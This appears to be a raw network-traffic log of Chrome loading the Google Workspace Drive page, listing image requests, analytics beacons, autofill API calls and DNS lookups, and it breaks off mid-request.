user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/S26WkdqBRQZW8PC_mo5mE45tepl9xY74x1-esi0Upaey-XV0sbs4Fvt7Uq3sP5LARkSbsOwTTIjKUiXTbVtArtuP4Fg-a7v4cAVN=e365-pa-nu-s0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /S26WkdqBRQZW8PC_mo5mE45tepl9xY74x1-esi0Upaey-XV0sbs4Fvt7Uq3sP5LARkSbsOwTTIjKUiXTbVtArtuP4Fg-a7v4cAVN=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/5PYAwhP5cuGQEIi-R8V-keA4jaJZG82g8iBrKCoPKXHCP2nyyO6i6kzAH0i8MA8AVwgOAlxzcai7yKHVzVmUeHMd_FkVeQIG41s=e365-pa-nu-s0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /5PYAwhP5cuGQEIi-R8V-keA4jaJZG82g8iBrKCoPKXHCP2nyyO6i6kzAH0i8MA8AVwgOAlxzcai7yKHVzVmUeHMd_FkVeQIG41s=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/RzrCOW3W04EKFPlpQeagbcX-3FrUDfpa7qKhYBVJq0KQxjfBwoRBHGJpTWM2FAQgqioEmE5OxwLslpmuHpN-zD2mqY_AWKj95bsE

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /RzrCOW3W04EKFPlpQeagbcX-3FrUDfpa7qKhYBVJq0KQxjfBwoRBHGJpTWM2FAQgqioEmE5OxwLslpmuHpN-zD2mqY_AWKj95bsE HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/dvAfIQb0KajN6WUONfemiYUwCwrzoN7qAUsioJt2DyV1dt3LNLUmxHHvCXFHI6ZEFxjx_ClxenFxr587O36XX8a5QeUMEAS-1WJe

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /dvAfIQb0KajN6WUONfemiYUwCwrzoN7qAUsioJt2DyV1dt3LNLUmxHHvCXFHI6ZEFxjx_ClxenFxr587O36XX8a5QeUMEAS-1WJe HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/mFX4RtYSpBwXZXB71FNeXM6v9iEcAsCYoEWvaA0SJB_EfOi2TvXNJ455zRiaCZb-_IiTsbEDlOWQi1Y2as2t_9rzUQe6zkldGInt

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /mFX4RtYSpBwXZXB71FNeXM6v9iEcAsCYoEWvaA0SJB_EfOi2TvXNJ455zRiaCZb-_IiTsbEDlOWQi1Y2as2t_9rzUQe6zkldGInt HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/S26WkdqBRQZW8PC_mo5mE45tepl9xY74x1-esi0Upaey-XV0sbs4Fvt7Uq3sP5LARkSbsOwTTIjKUiXTbVtArtuP4Fg-a7v4cAVN=e365-pa-nu-s0-v0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /S26WkdqBRQZW8PC_mo5mE45tepl9xY74x1-esi0Upaey-XV0sbs4Fvt7Uq3sP5LARkSbsOwTTIjKUiXTbVtArtuP4Fg-a7v4cAVN=e365-pa-nu-s0-v0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/5PYAwhP5cuGQEIi-R8V-keA4jaJZG82g8iBrKCoPKXHCP2nyyO6i6kzAH0i8MA8AVwgOAlxzcai7yKHVzVmUeHMd_FkVeQIG41s=e365-pa-nu-s0-v0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /5PYAwhP5cuGQEIi-R8V-keA4jaJZG82g8iBrKCoPKXHCP2nyyO6i6kzAH0i8MA8AVwgOAlxzcai7yKHVzVmUeHMd_FkVeQIG41s=e365-pa-nu-s0-v0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/qi-5khAOg8HlqE6BVJSyGuReX7cLrXx-tg_UlrLsP0sTvuIvMe2IdCenW9jL-KTjxkVf9f0ONBMOTBPE84bp-cl6PPEKhNgRzTQ=e365-pa-nu-s0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /qi-5khAOg8HlqE6BVJSyGuReX7cLrXx-tg_UlrLsP0sTvuIvMe2IdCenW9jL-KTjxkVf9f0ONBMOTBPE84bp-cl6PPEKhNgRzTQ=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/luR__x3sJf7BA833oja0gDViwRv_hnYZKBEcQOo9iBu3eKttHYmktkaCRjE4ECxmzFSQTIxMoCyhRY6WwXPJvw564LfY457Eig=e365-pa-nu-s0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /luR__x3sJf7BA833oja0gDViwRv_hnYZKBEcQOo9iBu3eKttHYmktkaCRjE4ECxmzFSQTIxMoCyhRY6WwXPJvw564LfY457Eig=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/SB__9Ik-UqlTHS9Mp0zO-QVdPPVxb3o1Ek17Z3y1Q7_rUGN0j8s-xA0rqdAXM0Mb1z3VJ8v-rDzHfDX-yLGfMxgbaKGAGHPmQZis=e365-pa-nu-s0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /SB__9Ik-UqlTHS9Mp0zO-QVdPPVxb3o1Ek17Z3y1Q7_rUGN0j8s-xA0rqdAXM0Mb1z3VJ8v-rDzHfDX-yLGfMxgbaKGAGHPmQZis=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/kb_Qu0wccTbbxMVmy7WnBOrPO8taACz0oi32xRNPuBBZe4uz50DwiYufFP7S3E230TGQSEu3Nu021PDcIADDimr7HrenNYCVv_EY=e365-pa-nu-s0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /kb_Qu0wccTbbxMVmy7WnBOrPO8taACz0oi32xRNPuBBZe4uz50DwiYufFP7S3E230TGQSEu3Nu021PDcIADDimr7HrenNYCVv_EY=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/wePSigsq8uFv9S_k42piWs8mGFKr97FSAonu0EnxiiEim4g4n6KIGiu9o0OgbP8zq6GeJQW60MEDzWAWb5ahu9Sa0ZYUnh1fO8E=e365-pa-nu-s0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /wePSigsq8uFv9S_k42piWs8mGFKr97FSAonu0EnxiiEim4g4n6KIGiu9o0OgbP8zq6GeJQW60MEDzWAWb5ahu9Sa0ZYUnh1fO8E=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/I-x3e5aXGAe8z9azwZi2W1Axx1xsibQBx8TRVHhbFhRucNWn-6PngJ1BoXci_06bcmvUaVc_HLTvPsv6NiqKJq4QyuYbYfm9bj9iZA=e365-pa-nu-s0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /I-x3e5aXGAe8z9azwZi2W1Axx1xsibQBx8TRVHhbFhRucNWn-6PngJ1BoXci_06bcmvUaVc_HLTvPsv6NiqKJq4QyuYbYfm9bj9iZA=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/5xw2Y5jI0iz24qieD7U1ETqd1dwUZvtmZuJiGkKSQj-yEFaEVmLw6XgKXzOLon_RiX-5t3amygvXebgNN8bgyxQlO_3vhAgwpyMc=e365-pa-nu-s0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /5xw2Y5jI0iz24qieD7U1ETqd1dwUZvtmZuJiGkKSQj-yEFaEVmLw6XgKXzOLon_RiX-5t3amygvXebgNN8bgyxQlO_3vhAgwpyMc=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/gXQ1CySD9oW9wM2niB5c0fnbttInuG7qtUzp7oQzry-ok6hg3lMuk6z0yKJTgUd2qBGs3xJwZF64iflmj8xP8SUwOvNbLPHGICjT=e365-pa-nu-s0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /gXQ1CySD9oW9wM2niB5c0fnbttInuG7qtUzp7oQzry-ok6hg3lMuk6z0yKJTgUd2qBGs3xJwZF64iflmj8xP8SUwOvNbLPHGICjT=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://storage.googleapis.com/assets_workspace/uploads/7uffzv9dk4sn-3652TCzauH9jaL0QJ8H6FM-bfed64c7e8da9ac20d439f436570f955-Drive_Full_Logo_2x.svg

chrome.exe

Remote address:

142.250.179.251:443

Request

GET /assets_workspace/uploads/7uffzv9dk4sn-3652TCzauH9jaL0QJ8H6FM-bfed64c7e8da9ac20d439f436570f955-Drive_Full_Logo_2x.svg HTTP/2.0
host: storage.googleapis.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://storage.googleapis.com/assets_workspace/uploads/7uffzv9dk4sn-7LhoZoRSU32Sn20yI8213k-92d83d07ba564bddac887d329c3589c2-Vector.svg

chrome.exe

Remote address:

142.250.179.251:443

Request

GET /assets_workspace/uploads/7uffzv9dk4sn-7LhoZoRSU32Sn20yI8213k-92d83d07ba564bddac887d329c3589c2-Vector.svg HTTP/2.0
host: storage.googleapis.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://ssl.google-analytics.com/ga.js

chrome.exe

Remote address:

142.250.178.8:443

Request

GET /ga.js HTTP/2.0
host: ssl.google-analytics.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://ssl.google-analytics.com/r/__utm.gif?utmwv=5.7.2&utms=1&utmn=226365011&utmhn=workspace.google.com&utme=8(Region*Language*Original%20URL*Country*14!uaRef)9(noram*en*workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F*us*14!val%3A)11(2*2*4!2)&utmcs=UTF-8&utmsr=1280x720&utmvp=1263x585&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&utmhid=2053226132&utmr=-&utmp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F%3Fchannel%3D%26e%3D&utmht=1736791374540&utmac=UA-18073-1&utmgtm=45He5190n51Q4J6v595350za200&utmcc=__utma%3D61317162.1091814047.1736791374.1736791374.1736791374.1%3B%2B__utmz%3D61317162.1736791374.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&aip=1&utmjid=1588573506&utmredir=1&utmmt=1&utmu=q_CgACBAAAGBAAAAAgAAAAAE~

chrome.exe

Remote address:

142.250.178.8:443

Request

GET /r/__utm.gif?utmwv=5.7.2&utms=1&utmn=226365011&utmhn=workspace.google.com&utme=8(Region*Language*Original%20URL*Country*14!uaRef)9(noram*en*workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F*us*14!val%3A)11(2*2*4!2)&utmcs=UTF-8&utmsr=1280x720&utmvp=1263x585&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&utmhid=2053226132&utmr=-&utmp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F%3Fchannel%3D%26e%3D&utmht=1736791374540&utmac=UA-18073-1&utmgtm=45He5190n51Q4J6v595350za200&utmcc=__utma%3D61317162.1091814047.1736791374.1736791374.1736791374.1%3B%2B__utmz%3D61317162.1736791374.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&aip=1&utmjid=1588573506&utmredir=1&utmmt=1&utmu=q_CgACBAAAGBAAAAAgAAAAAE~ HTTP/2.0
host: ssl.google-analytics.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTIzLjAuNjMxMi4xMjMSIAmQPV0x4uaegxIFDQ-obAwSBQ3-OcPhIWJhcZEEvqEs?alt=proto

chrome.exe

Remote address:

142.250.187.202:443

Request

GET /v1/pages/ChVDaHJvbWUvMTIzLjAuNjMxMi4xMjMSIAmQPV0x4uaegxIFDQ-obAwSBQ3-OcPhIWJhcZEEvqEs?alt=proto HTTP/2.0
host: content-autofill.googleapis.com
x-goog-encode-response-if-executable: base64
x-goog-api-key: AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
x-client-data: CJ/1ygE=
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTIzLjAuNjMxMi4xMjMSJwmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioByHKFf2CpcjaZw==?alt=proto

chrome.exe

Remote address:

142.250.187.202:443

Request

GET /v1/pages/ChVDaHJvbWUvMTIzLjAuNjMxMi4xMjMSJwmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioByHKFf2CpcjaZw==?alt=proto HTTP/2.0
host: content-autofill.googleapis.com
x-goog-encode-response-if-executable: base64
x-goog-api-key: AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
x-client-data: CJ/1ygE=
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

46.200.250.142.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

46.200.250.142.in-addr.arpa

IN PTR

Response

46.200.250.142.in-addr.arpa

IN PTR

lhr48s30-in-f141e100net
DNS

46.200.250.142.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

46.200.250.142.in-addr.arpa

IN PTR

Response

46.200.250.142.in-addr.arpa

IN PTR

lhr48s30-in-f141e100net
DNS

227.187.250.142.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

227.187.250.142.in-addr.arpa

IN PTR

Response

227.187.250.142.in-addr.arpa

IN PTR

lhr25s34-in-f31e100net
DNS

region1.google-analytics.com

NetworkService

Remote address:

8.8.8.8:53

Request

region1.google-analytics.com

IN A

Response

region1.google-analytics.com

IN A

216.239.34.36

region1.google-analytics.com

IN A

216.239.32.36
DNS

region1.google-analytics.com

NetworkService

Remote address:

8.8.8.8:53

Request

region1.google-analytics.com

IN A

Response

region1.google-analytics.com

IN A

216.239.32.36

region1.google-analytics.com

IN A

216.239.34.36
DNS

251.179.250.142.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

251.179.250.142.in-addr.arpa

IN PTR

Response

251.179.250.142.in-addr.arpa

IN PTR

lhr25s31-in-f271e100net
DNS

202.187.250.142.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

202.187.250.142.in-addr.arpa

IN PTR

Response

202.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f101e100net
DNS

202.187.250.142.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

202.187.250.142.in-addr.arpa

IN PTR

Response

202.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f101e100net
DNS

72.204.58.216.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

72.204.58.216.in-addr.arpa

IN PTR

Response

72.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f721e100net

72.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f8�H

72.204.58.216.in-addr.arpa

IN PTR

lhr48s49-in-f8�H
DNS

8.178.250.142.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

8.178.250.142.in-addr.arpa

IN PTR

Response

8.178.250.142.in-addr.arpa

IN PTR

lhr48s27-in-f81e100net
DNS

apis.google.com

NetworkService

Remote address:

8.8.8.8:53

Request

apis.google.com

IN A

Response

apis.google.com

IN CNAME

plus.l.google.com

plus.l.google.com

IN A

142.250.178.14
DNS

apis.google.com

NetworkService

Remote address:

8.8.8.8:53

Request

apis.google.com

IN A

Response

apis.google.com

IN CNAME

plus.l.google.com

plus.l.google.com

IN A

142.250.178.14
POST

https://region1.google-analytics.com/g/collect?v=2&tid=G-FWCBRW1RY8&gtm=45je5190v886057375z8595350za200zb595350&_p=1736791373704&gcs=G101&gcd=13q3r3l3l5l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&ul=en&cid=1332354461.1736791375&sr=1280x720&_ng=1&ir=1&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B123.0.6312.123%7CNot%253AA-Brand%3B8.0.0.0%7CChromium%3B123.0.6312.123&uamb=0&uam=&uap=Windows&uapv=14.0.0&uaw=0&frm=0&pscdl=denied&_eu=EA&_s=1&dl=https%3A%2F%2Fworkspacegoogle.com%2Fus%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&dp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&sid=1736791374&sct=1&seg=0&dt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&en=page_view&_fv=1&_nsi=1&_ss=1&_c=1&ep.region=noram&ep.original_url=workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&ep.cs_employee_count=&ep.concatenated_exids=(not%20set)&ep.apps_marketing_signals_cookie=source%3D%26lastExperiment%3D%26allExperiments%3D&ep.cs_industry=&ep.cs_formid=33&ep.locale=en_us&ep.resolution=